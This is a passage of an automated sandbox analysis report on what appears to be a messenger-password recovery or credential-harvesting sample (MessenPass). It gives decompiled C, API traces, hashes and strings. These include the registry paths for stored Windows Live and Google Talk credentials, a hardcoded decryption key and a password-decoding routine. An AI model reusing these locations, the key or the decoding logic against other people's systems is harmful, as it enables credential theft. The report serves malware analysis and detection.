                                  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                • sprintf.MSVCRT ref: 0040A717
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                • String ID: </%s>
                                • API String ID: 3699762281-259020660
                                • Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                • Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
                                • Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                • Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040783B(void* __eax, void* __eflags) {
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				int _t10;
                                				int _t11;
                                				char* _t13;
                                				char* _t18;
                                				void* _t19;
                                				void* _t23;
                                
                                				_t19 = __eax;
                                				E00407930(__eax);
                                				_t1 = _t23 + 0x14; // 0x4042e3
                                				_t2 = _t19 + 0x3cc; // 0x4cb
                                				_t18 = _t2;
                                				E00406958(0x143, _t18,  *_t1);
                                				 *((intOrPtr*)(_t23 + 0x1c)) = _t19 + 4;
                                				_t10 = strlen(_t18);
                                				_t11 = strlen(0x417f90);
                                				_t13 =  *((intOrPtr*)(_t23 + 0x20));
                                				if(_t11 + _t10 + 1 >= 0x143) {
                                					 *_t13 = 0;
                                					return _t13;
                                				}
                                				return E00406B4B(_t13, _t18, 0x417f90);
                                			}













                                APIs
                                  • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                • strlen.MSVCRT ref: 00407862
                                • strlen.MSVCRT ref: 0040786F
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                • String ID: *.*$B@
                                • API String ID: 470300861-2086290067
                                • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: ntdll.dll
                                • API String ID: 2574300362-2227199552
                                • Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                • Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
                                • Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                • Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040923A(void** __esi, struct HWND__* _a4) {
                                				long _v8;
                                				signed int _v20;
                                				signed int _v24;
                                				short _v28;
                                				void* _v36;
                                				void* _t17;
                                				long _t22;
                                				short* _t25;
                                				int _t27;
                                				void** _t28;
                                
                                				_t28 = __esi;
                                				_t27 = 0;
                                				if(_a4 != 0) {
                                					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                					if(__esi[1] > 0) {
                                						do {
                                							_v24 = _v24 & 0x00000000;
                                							_v20 = _v20 & 0x00000000;
                                							_t25 =  *_t28 + _t27 * 4;
                                							_v36 = 0x22;
                                							_t22 = SendMessageA(_a4, 0x1019, _t27,  &_v36);
                                							if(_t22 != 0) {
                                								 *_t25 = _v28;
                                								_t22 = _v8;
                                								 *(_t25 + 2) = _t22;
                                							}
                                							_t27 = _t27 + 1;
                                						} while (_t27 < _t28[1]);
                                						return _t22;
                                					}
                                				}
                                				return _t17;
                                			}














                                APIs
                                • memset.MSVCRT ref: 00409252
                                • SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: "
                                • API String ID: 568519121-123907689
                                • Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                • Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
                                • Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                • Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040C3AF(void* __esi) {
                                				struct _WNDCLASSA _v44;
                                				struct HINSTANCE__* _t15;
                                				struct HWND__* _t21;
                                
                                				_t15 =  *0x41dbd4; // 0x400000
                                				_v44.hInstance = _t15;
                                				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
                                				_v44.lpszClassName = __esi + 4;
                                				_v44.style = 0;
                                				_v44.lpfnWndProc = E00402CAC;
                                				_v44.cbClsExtra = 0;
                                				_v44.cbWndExtra = 0;
                                				_v44.hCursor = 0;
                                				_v44.hbrBackground = 0x10;
                                				_v44.lpszMenuName = 0;
                                				RegisterClassA( &_v44);
                                				_t21 = CreateWindowExA(0, 0x415454, 0x415454, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x41dbd4, __esi);
                                				 *(__esi + 0x108) = _t21;
                                				return _t21;
                                			}







                                APIs
                                • RegisterClassA.USER32(?), ref: 0040C3F0
                                • CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClassCreateRegisterWindow
                                • String ID: MessenPass
                                • API String ID: 3469048531-1347981195
                                • Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                • Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
                                • Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                • Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadMenuA.USER32(00000000), ref: 00408A31
                                • sprintf.MSVCRT ref: 00408A54
                                  • Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
                                  • Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
                                  • Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
                                  • Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
                                  • Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
                                  • Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
                                  • Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                • String ID: menu_%d
                                • API String ID: 1129539653-2417748251
                                • Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                • Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
                                • Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                • Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00409141(char* __esi) {
                                				char* _t2;
                                				char* _t5;
                                
                                				_t5 = __esi;
                                				E004069E8(__esi);
                                				_t2 = strrchr(__esi, 0x2e);
                                				if(_t2 != 0) {
                                					 *_t2 = 0;
                                				}
                                				0x413cf4(_t5, "_lng.ini");
                                				return _t2;
                                			}

                                APIs
                                  • Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3
                                • strrchr.MSVCRT ref: 0040914A
                                • _mbscat.MSVCRT ref: 0040915F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileModuleName_mbscatstrrchr
                                • String ID: _lng.ini
                                • API String ID: 3334749609-1948609170
                                • Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                • Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
                                • Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                • Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00406DA8(struct HWND__* _a4) {
                                				signed int _t5;
                                
                                				_t5 = SetWindowLongA(_a4, 0xffffffec, GetWindowLongA(_a4, 0xffffffec) | 0x00400000);
                                				asm("sbb eax, eax");
                                				return  ~( ~_t5);
                                			}

                                APIs
                                • GetWindowLongA.USER32(?,000000EC), ref: 00406DAE
                                • SetWindowLongA.USER32(000000EC,000000EC,00000000), ref: 00406DC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: LongWindow
                                • String ID: MZ@
                                • API String ID: 1378638983-2978689999
                                • Opcode ID: d2a461ae841fa0dde44b9faf912a436fc80ff43710132b853de9347092c42cfe
                                • Instruction ID: afbc625c57fd7c5c64aba701cafa3846435a0d62a4f17ca64e8d7e2a082489bd
                                • Opcode Fuzzy Hash: d2a461ae841fa0dde44b9faf912a436fc80ff43710132b853de9347092c42cfe
                                • Instruction Fuzzy Hash: ADC002711AC516ABDF112B64EC49EAB7EA9ABC1322F208B74B066E50F1CB318450DA59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E00407E33(intOrPtr* _a4, intOrPtr _a8, char* _a12) {
                                				int _v12;
                                				int _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				char _v28;
                                				char* _v32;
                                				char _v36;
                                				signed int* _v40;
                                				char _v44;
                                				void _v304;
                                				char _v560;
                                				void _v2607;
                                				char _v2608;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				signed int _t39;
                                				signed int _t40;
                                				signed int _t44;
                                				signed int* _t64;
                                				char _t72;
                                				signed int _t77;
                                				char* _t78;
                                				void* _t81;
                                				void* _t82;
                                				int _t84;
                                				char* _t86;
                                				void* _t88;
                                				signed int _t93;
                                
                                				_t39 = strlen(_a12);
                                				_t77 = _t39;
                                				_t40 = _t39 & 0x80000001;
                                				if(_t40 < 0) {
                                					_t40 = (_t40 - 0x00000001 | 0xfffffffe) + 1;
                                					_t93 = _t40;
                                				}
                                				if(_t93 != 0 || _t77 <= 0x20) {
                                					return _t40;
                                				} else {
                                					_t82 = 0;
                                					_v2608 = 0;
                                					memset( &_v2607, 0, 0x7ff);
                                					_t64 = _a4 + 4;
                                					_t44 =  *_t64 | 0x00000001;
                                					_v12 = 0;
                                					if(_t77 <= 4) {
                                						L8:
                                						_v28 = _t82;
                                						_v20 = _t82;
                                						_v24 = _t82;
                                						if(E00404C9D( &_v28, 0) != 0) {
                                							_v36 = _v12;
                                							_v32 =  &_v2608;
                                							_v44 = 0x10;
                                							_v40 = _t64;
                                							if(E00404CF5( &_v28,  &_v36,  &_v44,  &_v16) != 0) {
                                								_t84 = _v16;
                                								if(_t84 > 0xff) {
                                									_t84 = 0xff;
                                								}
                                								_v560 = 0;
                                								_v304 = 0;
                                								memcpy( &_v304, _v12, _t84);
                                								_t78 =  &_v560;
                                								 *((char*)(_t88 + _t84 - 0x12c)) = 0;
                                								E00406958(0xff, _t78, _a8);
                                								 *((intOrPtr*)( *_a4))(_t78);
                                								LocalFree(_v12);
                                							}
                                						}
                                						return E00404CE0( &_v28);
                                					}
                                					_t86 =  &(_a12[5]);
                                					_t81 = (_t77 + 0xfffffffb >> 1) + 1;
                                					do {
                                						_t72 = ( *((intOrPtr*)(_t86 - 1)) - 0x00000001 << 0x00000004 |  *_t86 - 0x00000021) - _t44;
                                						_t44 = _t44 * 0x10ff5;
                                						_t86 =  &(_t86[2]);
                                						_v12 = _v12 + 1;
                                						_t81 = _t81 - 1;
                                						 *((char*)(_t88 + _v12 - 0xa2c)) = _t72;
                                					} while (_t81 != 0);
                                					_t82 = 0;
                                					goto L8;
                                				}
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLocalmemcpymemsetstrlen
                                • String ID:
                                • API String ID: 3110682361-0
                                • Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                • Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
                                • Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                • Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                • Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
                                • Opcode Fuzzy Hash: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                • Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                APIs
                                • memset.MSVCRT ref: 004080A5
                                • memset.MSVCRT ref: 004080B9
                                • memset.MSVCRT ref: 004080D3
                                • memset.MSVCRT ref: 004080E8
                                • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                • strlen.MSVCRT ref: 0040815B
                                • strlen.MSVCRT ref: 0040816A
                                • memcpy.MSVCRT ref: 0040817C
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                • String ID: 5$H$O$b$i$}$}
                                • API String ID: 1832431107-3760989150
                                • Opcode ID: 282d28ced94b0fcaa9e4670a9559102abf7cd8878a85da3a2d842f9bb15e03e3
                                • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                • Opcode Fuzzy Hash: 282d28ced94b0fcaa9e4670a9559102abf7cd8878a85da3a2d842f9bb15e03e3
                                • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                • memcpy.MSVCRT ref: 0040F55C
                                • memcpy.MSVCRT ref: 0040F571
                                  • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                  • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                  • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                  • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                • API String ID: 2768085393-1693574875
                                • Opcode ID: fbe27986f187398f0f6099073cdbbb7c8c5267cb5e8994caa430772f60085481
                                • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                • Opcode Fuzzy Hash: fbe27986f187398f0f6099073cdbbb7c8c5267cb5e8994caa430772f60085481
                                • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                  • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                  • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                  • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424
                                • memset.MSVCRT ref: 00408392
                                  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                • memset.MSVCRT ref: 004083E3
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                • RegCloseKey.ADVAPI32(?), ref: 00408448
                                Strings
                                • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                • String ID: Software\Google\Google Talk\Accounts
                                • API String ID: 2959138223-1079885057
                                • Opcode ID: d775ac8ba569fd5f9c268c161b920f0f986bb662fffb9e6d05309f5eaf26b962
                                • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                • Opcode Fuzzy Hash: d775ac8ba569fd5f9c268c161b920f0f986bb662fffb9e6d05309f5eaf26b962
                                • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0041036C
                                  • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                  • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                • memset.MSVCRT ref: 004103A7
                                • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                • String ID:
                                • API String ID: 3143880245-0
                                • Opcode ID: 452b48431850dc4cfeda6c40ef1c1e9db479f0d3b12d6eb92d0ce8910a14a719
                                • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                • Opcode Fuzzy Hash: 452b48431850dc4cfeda6c40ef1c1e9db479f0d3b12d6eb92d0ce8910a14a719
                                • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                  • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                  • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                  • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itoamemset
                                • String ID:
                                • API String ID: 4165544737-0
                                • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FreeLibrary.KERNELBASE(?,0041019A,?,?,?,?,?,?,004041AC), ref: 00410172
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions